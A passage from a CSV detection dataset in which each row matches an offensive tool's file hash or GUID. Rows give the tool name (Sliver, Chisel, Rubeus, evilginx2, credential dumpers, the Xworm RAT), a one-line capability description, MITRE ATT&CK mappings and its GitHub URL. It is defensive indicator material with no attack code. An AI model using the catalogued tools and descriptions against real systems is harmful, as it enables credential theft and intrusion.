fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*665593018e2d7938198172532fad4e17c501253b1a75106904d0eb50bf2b8c75*",".{0,1000}665593018e2d7938198172532fad4e17c501253b1a75106904d0eb50bf2b8c75.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*665a22568c5d38db4ce74dde13053e8a66baf91356e4f35a9e2957c205a09f1a*",".{0,1000}665a22568c5d38db4ce74dde13053e8a66baf91356e4f35a9e2957c205a09f1a.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*6690cb6d6fa47260c2cf4ac43b64d2d46e7a7ae4f8d0f10f4fce5d423a1dacad*",".{0,1000}6690cb6d6fa47260c2cf4ac43b64d2d46e7a7ae4f8d0f10f4fce5d423a1dacad.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*66AA4619-4D0F-4226-9D96-298870E9BB50*",".{0,1000}66AA4619\-4D0F\-4226\-9D96\-298870E9BB50.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*66c00239681d0f5822544fa18f461864df248a0dc5a76c4a3f981dac5af89162*",".{0,1000}66c00239681d0f5822544fa18f461864df248a0dc5a76c4a3f981dac5af89162.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*66c368f799227a9b571f841057e2d5f12c862360d5f7f564da9936acd67c66a0*",".{0,1000}66c368f799227a9b571f841057e2d5f12c862360d5f7f564da9936acd67c66a0.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*66e0681a500c726ed52e5ea9423d2654*",".{0,1000}66e0681a500c726ed52e5ea9423d2654.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*675936ffca92c0a0cd91495a62d395bb5c2ab3752f3d2451a821af2fd2f63fb6*",".{0,1000}675936ffca92c0a0cd91495a62d395bb5c2ab3752f3d2451a821af2fd2f63fb6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*675f1d8076801a64dc3c39916e52ac7b345b7d1c9454a01f270ca9796dd86f7e*",".{0,1000}675f1d8076801a64dc3c39916e52ac7b345b7d1c9454a01f270ca9796dd86f7e.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*67606cb8ee6060aabae4dc8f24fad06d058363de920ab03511168840fc96111f*",".{0,1000}67606cb8ee6060aabae4dc8f24fad06d058363de920ab03511168840fc96111f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and 
library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*676766b4b6296303a601cf2191da028cc39681fa69b1da408242882f760c849b*",".{0,1000}676766b4b6296303a601cf2191da028cc39681fa69b1da408242882f760c849b.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*67681fc7c1c0d06af7eedea1eb1f1d04e2f7f34f47e1ce3ceca7e4b93e318ceb*",".{0,1000}67681fc7c1c0d06af7eedea1eb1f1d04e2f7f34f47e1ce3ceca7e4b93e318ceb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*676E89F3-4785-477A-BA1C-B30340F598D5*",".{0,1000}676E89F3\-4785\-477A\-BA1C\-B30340F598D5.{0,1000}","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","0","N/A","N/A","7","663","81","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z" 
"*67831df0ff8ed3ffacc3678a5c4c09a3fcb755ffbfc110d6f1ff61fe65f31d28*",".{0,1000}67831df0ff8ed3ffacc3678a5c4c09a3fcb755ffbfc110d6f1ff61fe65f31d28.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*6788355188c40674e65fd8d2bd610ec4be42d1a5d78116990c0d109863c39a3e*",".{0,1000}6788355188c40674e65fd8d2bd610ec4be42d1a5d78116990c0d109863c39a3e.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*678ce24e-70c4-47b1-b595-ca0835ba35d9*",".{0,1000}678ce24e\-70c4\-47b1\-b595\-ca0835ba35d9.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*67a5ff45328aa8bc9b0bb4a131dfe70a82bab7ad6c44074c9973421f27ff4fa3*",".{0,1000}67a5ff45328aa8bc9b0bb4a131dfe70a82bab7ad6c44074c9973421f27ff4fa3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*67c1cafb276ad174a24340f989c220db9a8997650b2f86cbc95a6979e73b4287*",".{0,1000}67c1cafb276ad174a24340f989c220db9a8997650b2f86cbc95a6979e73b4287.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5*",".{0,1000}67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - 
Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*68176e317f4294f7ed8cac8f270a3fcfb1a03000831ea6594c374d2318e976c6*",".{0,1000}68176e317f4294f7ed8cac8f270a3fcfb1a03000831ea6594c374d2318e976c6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*685cc5e58579e5f5a176e2be355398579f46cd64dfd0a0e82edf12316fc33b5b*",".{0,1000}685cc5e58579e5f5a176e2be355398579f46cd64dfd0a0e82edf12316fc33b5b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*68af509fd4c4e58e7cc291316b72dacc5bf2861340ac83da5fc1287a38f0e615*",".{0,1000}68af509fd4c4e58e7cc291316b72dacc5bf2861340ac83da5fc1287a38f0e615.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*68cfcef00c7be228c8c10ec35874bbbf3e3a6eec33ce3c2697af0aa8bcf844d3*",".{0,1000}68cfcef00c7be228c8c10ec35874bbbf3e3a6eec33ce3c2697af0aa8bcf844d3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*68d9f28535974326ecf0a8746d0c6e8c7ccf4ac464f083eb375f998f2eb52ab9*",".{0,1000}68d9f28535974326ecf0a8746d0c6e8c7ccf4ac464f083eb375f998f2eb52ab9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*68e3ce34f0d904e715ea8471373abc3632bfe4fd945e1a4976baa18d003dff7a*",".{0,1000}68e3ce34f0d904e715ea8471373abc3632bfe4fd945e1a4976baa18d003dff7a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6905595a21a2a1d669fb80a6fd3f97db4692d98ad9e33eae64466c7cfbaabb8b*",".{0,1000}6905595a21a2a1d669fb80a6fd3f97db4692d98ad9e33eae64466c7cfbaabb8b.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" 
"*691f577714a4ae22bc22ec49edec5a15bf546a9827e8e1cf4e9e688b2ba9f72e*",".{0,1000}691f577714a4ae22bc22ec49edec5a15bf546a9827e8e1cf4e9e688b2ba9f72e.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*692110b2f60de3d52ac15e84be38fab5f9a16249b2bb0011af047b174efceeda*",".{0,1000}692110b2f60de3d52ac15e84be38fab5f9a16249b2bb0011af047b174efceeda.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*6952343cc4614857f83dbb81247871e7*",".{0,1000}6952343cc4614857f83dbb81247871e7.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*6973A4710FD88D32D47F4523E7EC098EF407F8ECED4B34AF6D3759CE1696EF19*",".{0,1000}6973A4710FD88D32D47F4523E7EC098EF407F8ECED4B34AF6D3759CE1696EF19.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*6975b175e41c894651afbb12b63a2254a405875733c348c204ca96b2fb81790d*",".{0,1000}6975b175e41c894651afbb12b63a2254a405875733c348c204ca96b2fb81790d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*69832c96ae4e5d3e7c006a6dd6a86322875f834306c9ef31363f0620a714ac80*",".{0,1000}69832c96ae4e5d3e7c006a6dd6a86322875f834306c9ef31363f0620a714ac80.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*69927f9215cf2d0717141e91851febb1c045715a11ebf9f55bc4181114625d41*",".{0,1000}69927f9215cf2d0717141e91851febb1c045715a11ebf9f55bc4181114625d41.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*69a200568ae92a6eee56c9fcc170b088432871fb058c29459e7bf112a58d722f*",".{0,1000}69a200568ae92a6eee56c9fcc170b088432871fb058c29459e7bf112a58d722f.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" 
"*69ace7287faa4854605ab46018d92332ba0d16ff926ebf17330359a4dbd7d693*",".{0,1000}69ace7287faa4854605ab46018d92332ba0d16ff926ebf17330359a4dbd7d693.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*69e041111e26111f406a95d9b91b5004f60ba367a0c90ffe34146e064513e56b*",".{0,1000}69e041111e26111f406a95d9b91b5004f60ba367a0c90ffe34146e064513e56b.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*69ee333eaf49be76d5bde1d3abfbd2e9a006a316284394e92aa71db1970d927d*",".{0,1000}69ee333eaf49be76d5bde1d3abfbd2e9a006a316284394e92aa71db1970d927d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*6a0271fa021d2854ea36531869d30a75d6ee7ff31a521e22e9b382ef1c545882*",".{0,1000}6a0271fa021d2854ea36531869d30a75d6ee7ff31a521e22e9b382ef1c545882.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 
- TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*6a14782fd71e08ded40b8652783cb49695b09e4abbaaf8c22cc22d582032191f*",".{0,1000}6a14782fd71e08ded40b8652783cb49695b09e4abbaaf8c22cc22d582032191f.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*6a1d90427fe92c1dae2ac16d5b0e7f6b2c823a1447cdad213cdb987390329b26*",".{0,1000}6a1d90427fe92c1dae2ac16d5b0e7f6b2c823a1447cdad213cdb987390329b26.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6A2BA6F7-3399-4890-9453-2D5BE8EEBBA9*",".{0,1000}6A2BA6F7\-3399\-4890\-9453\-2D5BE8EEBBA9.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*6a484c1db7718949c7027abde97e164c7e7e4e4214e3e29fe48ac4364c0cd23c*",".{0,1000}6a484c1db7718949c7027abde97e164c7e7e4e4214e3e29fe48ac4364c0cd23c.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*6a5607a6886ad393bd1926b90a6364fb8b6546ad6963f42571c609279b446faa*",".{0,1000}6a5607a6886ad393bd1926b90a6364fb8b6546ad6963f42571c609279b446faa.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" 
"*6a956fdb1b7c65755156898c2f4065a555eb80393a25dc8b1a118f87e67d8368*",".{0,1000}6a956fdb1b7c65755156898c2f4065a555eb80393a25dc8b1a118f87e67d8368.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6ab1c97d28cd80efc5b8698646098879e52c927b7096989b505380e5e6f3b24b*",".{0,1000}6ab1c97d28cd80efc5b8698646098879e52c927b7096989b505380e5e6f3b24b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*6ac9d19e7e7f05803c114b0a76b881f3536d1cc85198f1129d75a91c5efa6aa8*",".{0,1000}6ac9d19e7e7f05803c114b0a76b881f3536d1cc85198f1129d75a91c5efa6aa8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - 